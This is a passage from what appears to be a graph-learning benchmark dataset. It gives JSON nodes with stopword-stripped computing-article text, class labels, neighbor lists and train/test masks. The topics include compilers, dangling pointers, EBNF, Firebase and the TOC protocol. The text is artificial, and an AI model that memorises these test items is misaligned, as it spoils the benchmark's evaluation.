compilers generally perform compilations faster multi-pass compilers thus partly driven resource limitations early systems many early languages specifically designed could compiled single pass e.g. pascal cases design language feature may require compiler perform one pass source instance consider declaration appearing line 20 source affects translation statement appearing line 10 case first pass needs gather information declarations appearing statements affect actual translation happening subsequent pass disadvantage compiling single pass possible perform many sophisticated optimizations needed generate high quality code difficult count exactly many passes optimizing compiler makes instance different phases optimization may analyse one expression many times analyse another expression splitting compiler small programs technique used researchers interested producing provably correct compilers proving correctness set small programs often requires less effort proving correctness larger single equivalent program regardless exact number phases compiler design phases assigned one three stages stages include front end middle end back end front/middle/back-end approach makes possible combine front ends different languages back ends different cpus sharing optimizations middle end practical examples approach gnu compiler collection llvm amsterdam compiler kit multiple front-ends shared optimizations multiple back-ends front end analyzes source code build internal representation program called intermediate representation ir also manages symbol table data structure mapping symbol source code associated information location type scope frontend single monolithic function program scannerless parser commonly implemented analyzed several phases may execute sequentially concurrently method favored due modularity separation concerns commonly today frontend broken three phases lexical analysis also known lexing syntax analysis also known scanning parsing semantic analysis lexing parsing comprise syntactic analysis word syntax phrase syntax respectively simple cases modules lexer parser automatically generated grammar language though complex cases require manual modification lexical grammar phrase grammar usually context-free grammars simplifies analysis significantly context-sensitivity handled semantic analysis phase semantic analysis phase generally complex written hand partially fully automated using attribute grammars phases broken lexing scanning evaluating parsing building concrete syntax tree cst parse tree transforming abstract syntax tree ast syntax tree cases additional phases used notably line reconstruction preprocessing rare main phases front end include following middle end also known optimizer performs optimizations intermediate representation order improve performance quality produced machine code middle end contains optimizations independent cpu architecture targeted main phases middle end include following compiler analysis prerequisite compiler optimization tightly work together example dependence analysis crucial loop transformation scope compiler analysis optimizations vary greatly scope may range operating within basic block whole procedures even whole program trade-off granularity optimizations cost compilation example peephole optimizations fast perform compilation affect small local fragment code performed independently context code fragment appears contrast interprocedural optimization requires compilation time memory space enable optimizations possible considering behavior multiple functions simultaneously interprocedural analysis optimizations common modern commercial compilers hp ibm sgi intel microsoft sun microsystems free software gcc criticized long time lacking powerful interprocedural optimizations changing respect another open source compiler full analysis optimization infrastructure open64 used many organizations research commercial purposes due extra time space needed compiler analysis optimizations compilers skip default users use compilation options explicitly tell compiler optimizations enabled back end responsible cpu architecture specific optimizations code generation main phases back end include following compiler correctness branch software engineering deals trying show compiler behaves according language specification techniques include developing compiler using formal methods using rigorous testing often called compiler validation existing compiler higher-level programming languages usually appear type translation mind either designed compiled language interpreted language however practice rarely anything language requires exclusively compiled exclusively interpreted although possible design languages rely re-interpretation run time categorization usually reflects popular widespread implementations language — instance basic sometimes called interpreted language c compiled one despite existence basic compilers c interpreters interpretation replace compilation completely hides user makes gradual even though interpreter interpreted directly executed program needed somewhere bottom stack see machine language compilers contain interpreters optimization reasons example expression executed compilation results inserted output program prevents recalculated time program runs greatly speed final program modern trends toward just-in-time compilation bytecode interpretation times blur traditional categorizations compilers interpreters even language specifications spell implementations must include compilation facility example common lisp however nothing inherent definition common lisp stops interpreted languages features easy implement interpreter make writing compiler much harder example apl snobol4 many scripting languages allow programs construct arbitrary source code runtime regular string operations execute code passing special evaluation function implement features compiled language programs must usually shipped runtime library includes version compiler one classification compilers platform generated code executes known target platform native hosted compiler one whose output intended directly run type computer operating system compiler runs output cross compiler designed run different platform cross compilers often used developing software embedded systems intended support software development environment output compiler produces code virtual machine vm may may executed platform compiler produced reason compilers usually classified native cross compilers lower level language target compiler may high-level programming language c viewed sort portable assembly language frequently target language compilers example cfront original compiler c++ used c target language c code generated compiler usually intended readable maintained humans indent style creating pretty c intermediate code ignored features c make good target language include codice_1 directive generated compiler support debugging original source wide platform support available c compilers common compiler type outputs machine code many types",
    "neighbors": [
      2056,
      2062,
      4112,
      2065,
      10258,
      8226,
      2086,
      4144,
      2105,
      58,
      8258,
      8262,
      6228,
      8280,
      10333,
      8293,
      4201,
      107,
      6253,
      8301,
      6268,
      129,
      2177,
      136,
      10394,
      10395,
      2224,
      2225,
      4282,
      8385,
      10435,
      205,
      2255,
      213,
      217,
      219,
      10463,
      6369,
      8421,
      230,
      10469,
      10470,
      2281,
      10475,
      8435,
      4341,
      2304,
      261,
      2316,
      2327,
      2335,
      303,
      304,
      6450,
      10547,
      8501,
      8502,
      311,
      6460,
      10560,
      10568,
      10569,
      8522,
      8523,
      8524,
      6477,
      338,
      2386,
      8531,
      2392,
      10584,
      10585,
      356,
      6502,
      8554,
      10606,
      380,
      4483,
      8581,
      8582,
      393,
      4493,
      10638,
      10649,
      4508,
      6556,
      10654,
      8609,
      4516,
      6568,
      4521,
      428,
      10669,
      8624,
      2485,
      10680,
      10684,
      6594,
      4548,
      6596,
      4550,
      8644,
      10703,
      470,
      2519,
      10712,
      2523,
      477,
      2529,
      482,
      8677,
      487,
      8680,
      10729,
      10732,
      6640,
      10739,
      6652,
      512,
      2560,
      4608,
      515,
      10752,
      6664,
      8712,
      8722,
      8728,
      4633,
      8732,
      547,
      4656,
      564,
      2620,
      4669,
      6717,
      6718,
      10813,
      4674,
      8771,
      8773,
      10824,
      6753,
      2658,
      2666,
      4720,
      2675,
      6772,
      4728,
      2682,
      6795,
      6802,
      6815,
      6818,
      8868,
      6821,
      4775,
      4777,
      682,
      8874,
      8876,
      6837,
      4799,
      2754,
      2761,
      10953,
      8908,
      10964,
      727,
      4823,
      10971,
      4830,
      4844,
      2798,
      2804,
      2808,
      2809,
      6906,
      2817,
      4865,
      4866,
      6919,
      6921,
      8973,
      2830,
      797,
      2849,
      4900,
      805,
      806,
      6950,
      9002,
      9003,
      814,
      823,
      6969,
      9019,
      4930,
      6979,
      840,
      9034,
      11083,
      846,
      9045,
      2903,
      11099,
      9054,
      865,
      2915,
      868,
      9062,
      4968,
      876,
      9078,
      2936,
      7033,
      4992,
      898,
      2964,
      7071,
      7076,
      5031,
      9128,
      5040,
      946,
      9141,
      951,
      5065,
      11218,
      5078,
      3034,
      11227,
      11228,
      7134,
      5090,
      5097,
      3051,
      1004,
      11243,
      7158,
      11255,
      3067,
      7173,
      11269,
      3083,
      1038,
      9231,
      11279,
      1045,
      7193,
      11295,
      5154,
      5160,
      5165,
      9264,
      7219,
      9272,
      11326,
      9291,
      9299,
      3164,
      5213,
      1122,
      7267,
      7273,
      3186,
      9330,
      9331,
      1145,
      7292,
      11403,
      11406,
      11411,
      3237,
      7341,
      9391,
      1215,
      1219,
      1222,
      3277,
      9425,
      9432,
      5342,
      7392,
      11488,
      5346,
      11490,
      9445,
      5354,
      5356,
      11501,
      5358,
      5360,
      5361,
      5363,
      3323,
      7421,
      5374,
      3332,
      3334,
      5384,
      5395,
      5396,
      1301,
      5399,
      9497,
      1308,
      7462,
      5418,
      7480,
      7481,
      1343,
      1349,
      7494,
      3402,
      11596,
      7501,
      1360,
      1365,
      3413,
      5464,
      5466,
      11610,
      1376,
      11625,
      1392,
      9587,
      5492,
      3446,
      11641,
      7550,
      5503,
      9599,
      1409,
      3457,
      3459,
      3462,
      7562,
      3468,
      5523,
      9623,
      1435,
      3488,
      1448,
      11688,
      1459,
      1462,
      7609,
      1470,
      5569,
      9665,
      3529,
      5585,
      7634,
      1501,
      7645,
      3553,
      3554,
      5612,
      9714,
      3573,
      1535,
      5635,
      7684,
      5640,
      1552,
      9749,
      1565,
      3613,
      5663,
      5677,
      5679,
      9780,
      1591,
      1592,
      5695,
      1610,
      1611,
      1613,
      9808,
      3665,
      7770,
      3675,
      7772,
      9820,
      7775,
      1632,
      3700,
      5751,
      3705,
      5754,
      7805,
      3716,
      9865,
      9866,
      9871,
      1685,
      9877,
      5803,
      1715,
      5814,
      9911,
      5819,
      1724,
      7867,
      7870,
      9921,
      1730,
      7876,
      7880,
      9932,
      7889,
      5845,
      7904,
      9964,
      1776,
      5872,
      9977,
      9981,
      7940,
      5896,
      5897,
      1805,
      3854,
      1813,
      3867,
      10012,
      3869,
      10013,
      1824,
      3876,
      3886,
      7983,
      10040,
      5946,
      5948,
      3904,
      10051,
      3911,
      1864,
      8011,
      10065,
      1883,
      8031,
      10083,
      8037,
      3960,
      1922,
      6036,
      10142,
      6047,
      10145,
      8101,
      6061,
      1976,
      8122,
      4030,
      8136,
      10191,
      6112,
      6128,
      8188,
      2045,
      6142,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 1953,
    "label": 9,
    "text": "CGOL:cgol cgol pronounced see goll alternative syntax featuring extensible algebraic notation lisp programming language designed maclisp vaughan pratt subsequently ported common lisp notation cgol traditional algebraic notation sometimes called infix notation style algol rather lisp traditional uniformly-parenthesized prefix notation syntax cgol parser based pratt design top-down operator precedence parsing sometimes informally referred pratt parser semantically cgol essentially common lisp additional reader printer support special notations available many commonly used common lisp operations example one write matrix multiply routine cgol infix codice_1 operation referring common lisp codice_2 function infix codice_3 operation referring common lisp codice_4 function preceding example corresponds text native common lisp cgol uses codice_5 read set properties preceding example corresponds text native common lisp illustrates cgol notates function two arguments preceding example corresponds text native common lisp syntax cgol data-driven modifiable extensible cgol known work armed bear common lisp cgol source code text files containing discussions available freeware carnegie-mellon university artificial intelligence repository well richard fateman homepage university california berkeley",
    "neighbors": [
      512,
      9345,
      6502,
      5033,
      2062,
      4474
    ],
    "mask": "Test"
  },
  {
    "node_id": 1954,
    "label": 4,
    "text": "Dangling_pointer:dangling pointer dangling pointers wild pointers computer programming pointers point valid object appropriate type special cases memory safety violations generally dangling references wild references references resolve valid destination include phenomena link rot internet dangling pointers arise object destruction object incoming reference deleted deallocated without modifying value pointer pointer still points memory location deallocated memory system may reallocate previously freed memory program dereferences dangling pointer unpredictable behavior may result memory may contain completely different data program writes memory referenced dangling pointer silent corruption unrelated data may result leading subtle bugs extremely difficult find memory reallocated another process attempting dereference dangling pointer cause segmentation faults unix linux general protection faults windows program sufficient privileges allow overwrite bookkeeping data used kernel memory allocator corruption cause system instabilities object-oriented languages garbage collection dangling references prevented destroying objects unreachable meaning incoming pointers ensured either tracing reference counting however finalizer may create new references object requiring object resurrection prevent dangling reference wild pointers arise pointer used prior initialization known state possible programming languages show erratic behavior dangling pointers though less likely stay undetected many compilers raise warning compile time declared variables accessed initialized many languages e.g. c programming language deleting object memory explicitly destroying stack frame return alter associated pointers pointer still points location memory even though may used purposes straightforward example shown operating system able detect run-time references null pointers solution assign 0 null dp immediately inner block exited another solution would somehow guarantee dp used without initialization another frequent source dangling pointers jumbled combination malloc free library calls pointer becomes dangling block memory points freed previous example one way avoid make sure reset pointer null freeing reference—as demonstrated common misstep returning addresses stack-allocated local variable called function returns space variables gets deallocated technically garbage values attempts read pointer may still return correct value 1234 calling func functions called thereafter may overwrite stack storage allocated num values pointer would longer work correctly pointer num must returned num must scope beyond function—it might declared static 1945-1996 created complete object management system free dangling reference phenomenon see consequently note cost kill constant formula_2 similar approach proposed fisher leblanc name locks-and-keys wild pointers created omitting necessary initialization prior first use thus strictly speaking every pointer programming languages enforce initialization begins wild pointer often occurs due jumping initialization omitting compilers able warn like buffer-overflow bugs dangling/wild pointer bugs frequently become security holes example pointer used make virtual function call different address possibly pointing exploit code may called due vtable pointer overwritten alternatively pointer used writing memory data structure may corrupted even memory read pointer becomes dangling lead information leaks interesting data put next structure allocated privilege escalation now-invalid memory used security checks dangling pointer used freed without allocating new chunk memory becomes known use free vulnerability example cve-2014-1776 use-after-free vulnerability microsoft internet explorer 6 11 used zero-day attacks advanced persistent threat c simplest technique implement alternative version free alike function guarantees reset pointer however technique clear pointer variables may contain copy pointer alternative version used even guarantee validity empty pointer calling malloc uses masked define directives construct useful macros creating something like metalanguage embedded tool library apart every case programmers using technique use safe versions every instance free would used failing leads problem also solution limited scope single program project properly documented among structured solutions popular technique avoid dangling pointers c++ use smart pointers smart pointer typically uses reference counting reclaim objects techniques include tombstones method locks-and-keys method see paper fisher leblanc another approach use boehm garbage collector conservative garbage collector replaces standard memory allocation functions c c++ garbage collector approach completely eliminates dangling pointer errors disabling frees reclaiming objects garbage collection languages like java dangling pointers occur mechanism explicitly deallocate memory rather garbage collector may deallocate memory object longer reachable references language rust type system extended include also variables lifetimes resource acquisition initialization unless one disables features language dangling pointers caught compile time reported programming errors expose dangling pointer errors one common programming technique set pointers null pointer invalid address storage point released null pointer dereferenced languages program immediately terminate—there potential data corruption unpredictable behavior makes underlying programming mistake easier find resolve technique help multiple copies pointer debuggers automatically overwrite destroy data freed usually specific pattern codice_1 microsoft visual c/c++ debugger example uses codice_2 codice_3 codice_4 depending freed usually prevents data reused making useless also prominent pattern serves show programmer memory already freed tools polyspace totalview valgrind mudflap addresssanitizer tools based llvm also used detect uses dangling pointers tools softbound insure++ checkpointer instrument source code collect track legitimate values pointers metadata check pointer access metadata validity another strategy suspecting small set classes temporarily make member functions virtual class instance destructed/freed pointer virtual method table set codice_5 call member function crash program show guilty code debugger term dangling pointer may also used contexts programming especially technical people example phone number person since changed phones real-world example dangling pointer another example entry online encyclopedia refers another entry whose title changed changing previously existing references entry dangling pointers",
    "neighbors": [
      2304,
      3587,
      5636,
      779,
      4747,
      10510,
      655,
      5008,
      9490,
      11539,
      2709,
      11674,
      541,
      3871,
      10783,
      3234,
      7080,
      814,
      815,
      1715,
      3512,
      1723,
      5563,
      6078,
      2625,
      1474,
      8773,
      1094,
      3270,
      1736,
      4424,
      6730,
      8524,
      5325,
      6221,
      5840,
      7889,
      5074,
      6868,
      10581,
      86,
      2262,
      5080,
      9432,
      1242,
      4572,
      10333,
      1247,
      8545,
      3299,
      8573,
      2152,
      3048,
      9960,
      7403,
      8946,
      7671,
      3577,
      634,
      2045,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 1955,
    "label": 5,
    "text": "Plesiochronous_digital_hierarchy:plesiochronous digital hierarchy plesiochronous digital hierarchy pdh technology used telecommunications networks transport large quantities data digital transport equipment fibre optic microwave radio systems term plesiochronous derived greek plēsios meaning near chronos time refers fact pdh networks run state different parts network nearly quite perfectly synchronized backbone transport networks replaced pdh networks synchronous digital hierarchy sdh synchronous optical networking sonet equipment ten years ending around turn millennium 2000 whose floating payloads relaxed stringent timing requirements pdh network technology cost north america 4.5 billion 1998 alone p. 171 pdh allows transmission data streams nominally running rate allowing variation speed around nominal rate analogy two watches nominally running rate clocking 60 seconds every minute however link watches guarantee run exactly rate highly likely one running slightly faster data rate controlled clock equipment generating data rate allowed vary ±50 ppm 2048 kbit/s according itu-t recommendation means different data streams probably run slightly different rates one another order transport multiple data streams one place another common transmission medium multiplexed groups four four data streams necessarily running rate compensation introduced typically multiplexer takes data 4 incoming 2.048 mbit/s data streams feeds 2.112 mbit/s stream via buffer store leaving series fixed gaps frame data rate thus 2.112 mbit/s x number bits frame – number gaps number bits frame slightly greater 2.048 mbit/s 50ppm extra gap added slightly smaller 2.048 mbit/s – 50ppm thus average data rate made exactly equal incoming rate adding gap frames others extra gap fixed place frame referred stuffable bit contain data i.e ’ gap stuffed data 4 data streams contained 4 data streams 2.112 mbit/s synchronous easily multiplexed give single stream 8.448 mbit/s taking 1 bit stream 1 followed 1 bit stream 2 3 4 etc fixed gaps accommodate synchronisation word allows demultiplexer identify start frame others contain control bits stream say whether stuffable bit stuffed i.e contains data process reversed demultiplexer 4 data streams produced exactly bit rate previous timing irregularity ironed using phase locked loop scheme allow addition stuffed bit soon required stuffable bit fixed point frame necessary wait stuffable bit time slot wait results waiting time jitter arbitrarily low frequency i.e zero entirely eliminated filtering effects phase lock loop worst possible stuffing ratio would 1 frame 2 gives theoretical 0.5 bit jitter stuffing ratio carefully chosen give theoretical minimum jitter practical system however actual decision stuff may made comparing read address write address input buffer store position frame decision made varies adds second variable dependent length store process sometimes called pulse justification justification printing adding gaps line takes full column width believed term preferred ... stuffing stuffable bits waiting time jitter jitter get waiting stuff stuffable bit though technically correct sound like pleonasm similar techniques used combine four × 8 mbit/s together plus bit stuffing frame alignment giving 34 mbit/s four × 34 mbit/s gives 140 four × 140 gives 565 telecommunications networks independent clocks free-running precision clocks located nodes used synchronization variable storage buffers installed accommodate variations transmission delay nodes made large enough accommodate small time phase departures among nodal clocks control transmission traffic may occasionally interrupted allow buffers emptied stored data",
    "neighbors": [
      3168,
      835,
      4963,
      1893,
      9860,
      3847,
      11332,
      2860,
      1297,
      5875,
      3156,
      5118,
      7865,
      2206,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 1956,
    "label": 9,
    "text": "Extended_Backus–Naur_form:extended backus–naur form computer science extended backus-naur form ebnf family metasyntax notations used express context-free grammar ebnf used make formal description formal language computer programming language extensions basic backus–naur form bnf metasyntax notation earliest ebnf developed niklaus wirth incorporating concepts different syntax notation wirth syntax notation however many variants ebnf use international organization standardization adopted ebnf standard iso/iec 14977 1996 however according zaytsev standard ended adding yet another three dialects chaos noting lack success also notes iso ebnf even used iso standards wheeler argues using iso standard using ebnf recommends considering alternative ebnf notations one w3c extensible markup language xml 1.0 fifth edition article uses ebnf specified iso examples applying ebnfs ebnf variants use somewhat different syntactic conventions ebnf code expresses grammar formal language ebnf consists terminal symbols non-terminal production rules restrictions governing terminal symbols combined legal sequence examples terminal symbols include alphanumeric characters punctuation marks whitespace characters ebnf defines production rules sequences symbols respectively assigned nonterminal digit excluding zero 1 2 3 4 5 6 7 8 9 digit 0 digit excluding zero production rule defines nonterminal digit left side assignment vertical bar represents alternative terminal symbols enclosed quotation marks followed semicolon terminating character hence digit 0 digit excluding zero 1 2 3 forth 9 production rule also include sequence terminals nonterminals separated comma twelve 1 2 two hundred one 2 0 1 three hundred twelve 3 twelve twelve thousand two hundred one twelve two hundred one expressions may omitted repeated represented curly braces ... natural number digit excluding zero digit case strings 1 2 ... 10 ... 12345 ... correct expressions represent everything set within curly braces may repeated arbitrarily often including option represented squared brackets ... everything set within square brackets may present integer 0 natural number therefore integer zero 0 natural number may preceded optional minus sign ebnf also provides among things syntax describe repetitions specified number times exclude part production insert comments ebnf grammar following represents proposed iso/iec 14977 standard r. s. scowen page 7 table 1 even ebnf described using ebnf consider sketched grammar letter b c e f g digit 0 1 2 3 4 5 6 7 8 9 symbol character letter digit symbol identifier letter letter digit terminal character character lhs identifier rhs identifier rule lhs rhs grammar rule pascal-like programming language allows assignments defined ebnf follows syntactically correct program would language easily extended control flows arithmetical expressions input/output instructions small usable programming language would developed grammar defined ebnf also represented bnf though representations latter generally lengthier e.g. options repetitions directly expressed bnf require use intermediate rule alternative production defined either nothing optional production option either repeated production recursively repetition constructs still used ebnf bnf uses symbols := include quotes around terminal strings prevents characters used languages requires special symbol empty string ebnf terminals strictly enclosed within quotation marks ... ... angle brackets ... nonterminals omitted bnf syntax represent rule one line whereas ebnf terminating character semicolon marks end rule furthermore ebnf includes mechanisms enhancements defining number repetitions excluding alternatives comments etc examples following syntax rules illustrate facilities expressing repetition aa bb 3 aa b cc 3 aa c dd aa ee aa aa e ff 3 aa 3 aa f gg 3 aa g terminal strings defined rules follows according iso 14977 standard ebnf meant extensible two facilities mentioned first part ebnf grammar special sequence arbitrary text enclosed question marks interpretation text inside special sequence beyond scope ebnf standard example space character could defined following rule second facility extension using fact parentheses ebnf placed next identifiers must concatenated following valid ebnf following valid ebnf therefore extension ebnf could use notation example lisp grammar function application could defined following rule",
    "neighbors": [
      10560,
      6274,
      4293,
      6502,
      8262,
      1672,
      9062,
      2316,
      8524,
      7775,
      9871,
      1552,
      1116,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 1957,
    "label": 4,
    "text": "Boris_Loza:boris loza boris loza may 5 1960 founder safepatrol solutions tego systems well certified information systems security professional cissp born krasnodar russia attained masters degree age 22 phd age 26 computer science cybernetics still living former ussr loza published 30 scientific articles well secured one patent upon relocating canada 1996 phd confirmed higher attestation committee university toronto since immigrating loza worked ibm global services senior system administrator fidelity investments principal information systems security specialist loza interest computer security led continue developing products well publish articles book articles featured hacker magazines original phrack contributed 40 articles us industry magazines usenix sysadmin inside solaris inside internet several others 2005 loza published computer security book titled unix solaris linux practical security cookbook securing unix operating systems without third-party application number loza articles featured press including sun microsystems novell linux bsd communities work russian english translated several languages including french bulgarian polish loza holds secret level clearance government canada acts subject matter expert courts filed several information security patents usa conducted hundreds information security assessments security forensics penetration tests white hacking assessments speaker author trainer loza worked consults fortune global 500 companies including ibm fidelity investments well government agencies start-ups work cited books hack proofing sun solaris 8 among others 2008 boris loza internationally recognized work contribution field computer security awareness winner first international cyber security awareness contest held isc ² computer security products developed boris loza well co-authors loza current project notebak—a computer security system used personal corporate systems",
    "neighbors": [
      3323,
      8613,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1958,
    "label": 3,
    "text": "SVI-838:svi-838 svi-838 also known x'press 16 last microcomputer produced spectravideo hong kong although pc clone standard sound video coprocessors msx2 making hybrid system sales unimpressive considered collectible svi-811 adapter machine could run msx1 programs cartridge main itens",
    "neighbors": [
      11462,
      1515,
      3788,
      780,
      4078,
      6415,
      1776,
      6129,
      7983,
      9006,
      9166,
      9998,
      5368
    ],
    "mask": "None"
  },
  {
    "node_id": 1959,
    "label": 7,
    "text": "Firebase:firebase firebase mobile web application development platform developed firebase inc. 2011 acquired google 2014 october 2018 firebase platform 18 products used 1.5 million apps firebase evolved envolve prior startup founded james tamplin andrew lee 2011 envolve provided developers api enables integration online chat functionality websites releasing chat service tamplin lee found used pass application data n't chat messages developers using envolve sync application data game state real time across users tamplin lee decided separate chat system real-time architecture powered founded firebase separate company september 2011 launched public april 2012 firebase first product firebase real-time database api synchronizes application data across ios android web devices stores firebase cloud product assists software developers building real-time collaborative applications may 2012 one month beta launch firebase raised 1.1m seed funding venture capitalists flybridge capital partners greylock partners founder collective new enterprise associates june 2013 company raised 5.6m series funding venture capitalists union square ventures flybridge capital partners 2014 firebase launched two products firebase hosting firebase authentication positioned company mobile backend service october 2014 firebase acquired google october 2015 google acquired divshot merge firebase team may 2016 google i/o company annual developer conference firebase expanded services become unified platform mobile developers firebase integrates various google services including google cloud platform admob google ads offer broader products scale developers google cloud messaging google service send push notifications android devices superseded firebase product firebase cloud messaging added functionality deliver push notifications ios web devices january 2017 google acquired fabric crashlytics twitter add services firebase october 2017 firebase launched cloud firestore realtime document database successor product original firebase realtime database firebase analytics cost-free app measurement solution provides insight app usage user engagement formerly known google cloud messaging gcm firebase cloud messaging fcm cross-platform solution messages notifications android ios web applications 2016 used cost firebase auth service authenticate users using client-side code supports social login providers facebook github twitter google google play games additionally includes user management system whereby developers enable user authentication email password login stored firebase firebase provides realtime database backend service service provides application developers api allows application data synchronized across clients stored firebase cloud company provides client libraries enable integration android ios javascript java objective-c swift node.js applications database also accessible rest api bindings several javascript frameworks angularjs react ember.js backbone.js rest api uses server-sent events protocol api creating http connections receiving push notifications server developers using realtime database secure data using company server-side-enforced security rules january 31st 2019 cloud firestore officially brought beta making official product firebase line-up successor firebase original databasing system real-time database allows nested documents fields rather tree-view provided real-time database firebase storage provides secure file uploads downloads firebase apps regardless network quality developer use store images audio video user-generated content firebase storage backed google cloud storage firebase hosting static dynamic web hosting service launched may 13 2014 supports hosting static files css html javascript files well support cloud functions service delivers files content delivery network cdn http secure https secure sockets layer encryption ssl firebase partners fastly cdn provide cdn backing firebase hosting company states firebase hosting grew customer requests developers using firebase real-time database needed place host content ml kit mobile machine learning system developers launched may 8 2018 beta google i/o 2018 ml kit api feature variety features including text recognition detecting faces scanning barcodes labelling images recognising landmarks currently available ios android developers may also import tensorflow lite models given api n't enough api used on-device cloud crash reporting creates detailed reports errors app errors grouped clusters similar stack traces triaged severity impact app users addition automatic reports developer log custom events help capture steps leading crash acquiring crashlytics firebase using firebase crash reporting firebase performance provides insights app performance latencies app users experience firebase test lab android ios provides cloud-based infrastructure testing android ios apps one operation developers initiate testing apps across wide variety devices device configurations test results—including logs videos screenshots—are made available project firebase console even developer n't written test code app test lab exercise app automatically looking crashes.test lab ios currently beta earn google admob app marketing scope admob google product integrates firebase audience dynamic firebase links smart urls dynamically change behavior provide best available experience across multiple platforms desktop web browsers well ios android in-depth links mobile app dynamic links work app installs user opens dynamic link ios android application installed user prompted install app first installed application start running access link",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      3633,
      6212,
      69,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      3705,
      2170,
      7292,
      11391,
      10368,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1203,
      7359,
      7871,
      196,
      3269,
      3782,
      7370,
      10445,
      3795,
      1240,
      8923,
      8413,
      9949,
      6367,
      10470,
      1255,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      5382,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      5467,
      3940,
      5483,
      7537,
      7548,
      1409,
      4995,
      3462,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      937,
      6057,
      3499,
      7595,
      4044,
      4048,
      2001,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252
    ],
    "mask": "None"
  },
  {
    "node_id": 1960,
    "label": 5,
    "text": "Growl_(software):growl software growl global notification system pop-up notification implementation mac os x windows operating systems applications use growl display small notifications events may important user software allows users fully control notifications allowing application developers spend less time creating notifications growl developers concentrate usability notifications growl used conjunction apple notification center included mac os x 10.8 mountain lion higher growl installed preference pane added mac os x system preferences pane may used enable disable growl notifications specific applications specific notifications application notification provides information download finished name current itunes track software comes multiple display plugins providing user different style options presenting notifications display plugins include visual styles well ability send notifications via email sms push notifications additional third-party plugins scripts exist add growl notifications ichat mail thunderbird safari itunes application developers may make use growl api send notifications users growl includes bindings developers use objective-c c perl python tcl applescript java ruby programming languages growl website lists applications install growl without user permission including adobe creative suite 5 adobe published blog post apologizing installing growl users systems without permission says actively working mitigate problem adobe article knowledge base explaining notifications cs5 sends remove growl",
    "neighbors": [
      8582,
      8845,
      11418,
      9245,
      5677,
      7983,
      2045,
      692,
      9780,
      708,
      9035,
      7118,
      5072,
      7928,
      3284,
      10470,
      10088,
      8554,
      11000,
      637
    ],
    "mask": "Test"
  },
  {
    "node_id": 1961,
    "label": 4,
    "text": "Identity-based_security:identity-based security identity-based security approach control access digital product service based authenticated identity individual allows organizations grant access specific users access variety digital services using credentials ensuring accurate match users entitled actually receive also permitting access constraints company device location application type attributes underpinning identity-based security approach identity-based access control ibac identity-based licensing concept nist defines identity-based security policies policies based identities and/or attributes object system resource accessed subject user group users process device requesting access advantages identity-based security approach include ability exercise fine-grained control allowed use services functions users perform device-agnostic offering possibility enforce access control policy across variety devices smartphones tablets pcs identity-based security network security approach put forward cyberoam includes security components provides visibility control user activity particular network offers network security system includes user human identity part firewall rule matching criteria concept includes treating user identity eighth layer also known human layer network protocol stack thus attaching user identity security authenticating authorizing auditing network takes different step conventional security appliances bind security ip-addresses approach allows organisations create security policies align users groups rather ip addresses ultimately gives precise control access network—and access identity-based security prevents systems address spoofing attacks combining point encryption authentication access control single unit",
    "neighbors": [
      3521,
      2947,
      5573,
      8998,
      3880,
      939,
      4843,
      3629,
      2737,
      6162,
      3732,
      5624,
      5433,
      5373,
      2558,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 1962,
    "label": 5,
    "text": "TOC_protocol:toc protocol toc protocol talk oscar protocol protocol used third-party aol instant messenger clients several clients aol produced sometime near august 19 2005 aol discontinued support protocol longer uses instant messaging clients actively maintains windows mac clients aol instant messenger icq systems however produce several toc clients including tik tac written tcl/tk tnt written emacs lisp open source java client originally called tic later became quick buddy web applet aol also provided toc protocol specification openly developers hopes use instead proprietary oscar protocol use july 2012 aol turned toc2 servers longer possible connect aim using protocol toc ascii-based protocol oscar binary protocol addition toc contained fewer features oscar counterpart oscar provides functionality buddy icons file transfer advertising toc acted wrapper oscar protocol grand scheme things toc server nothing oscar client happened listen socket translating messages two protocols upon login toc client specified oscar login server presumably either login.oscar.aol.com login.icq.com toc server used behalf client toc used flap encapsulate messages oscar however flap hacked way implemented port http server default toc server operated http mode indistinguishable typical web server connecting client place http request writes string flapon followed two crlfs toc would switch gears start reading flap messages upon getting user profile client expected re-connect toc use http server would host user profile html connected two basic message formats communications inside flap existed client-to-server messages sent format resembling unix-style command line commands whitespace-separated arguments quoting backslash escape sequences server-to-client messages much simpler sent colon-separated ascii strings manner similar many unix config files thus quite easy write client incoming messages easy parse outgoing commands easy generate contrast oscar due binary representation data difficult understand toc2 protocol updated version toc protocol talk oscar protocol existence never documented aol used aol instant messenger clients clients beginning offer plugins toc2 light aol recent shutdown toc servers like predecessor toc2 ascii protocol lacks features oscar unlike toc toc2 known support buddy icons receiving file transfers sending toc2 operates essentially way toc wrapper oscar porting code toc toc2 remarkably easy well similarities toc1.0 toc2.0 better defined differences",
    "neighbors": [
      10242,
      3460,
      4490,
      1036,
      11408,
      3610,
      3228,
      10271,
      3105,
      9511,
      9519,
      692,
      8758,
      1467,
      6982,
      6855,
      2760,
      1738,
      2892,
      3284,
      3675,
      4318,
      3812,
      4068,
      6628,
      9572,
      488,
      5492,
      3959,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 1963,
    "label": 9,
